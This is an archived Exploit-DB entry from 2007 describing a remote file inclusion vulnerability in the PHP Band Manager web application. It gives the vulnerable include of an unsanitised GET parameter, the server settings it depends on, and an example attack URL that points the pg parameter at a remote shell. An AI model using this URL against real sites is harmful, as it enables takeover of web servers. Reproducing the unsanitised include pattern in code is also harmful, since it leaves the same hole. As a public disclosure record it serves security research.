exploit-db-mirror/exploits/php/webapps/3802.txt
Offensive Security 36c084c351 DB: 2021-09-03
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

17 lines
No EOL
288 B
Text

author:koray
greetz:cigicigi.net
script:http://sourceforge.net/projects/phpbandmanager
allow_url_fopen:on or register_globals:on
vuln;
/bandmanager/suite/index.php
include($_GET['pg'].".php");
example;
http://www.victim.com/suite/index.php?pg=shell link?
# milw0rm.com [2007-04-26]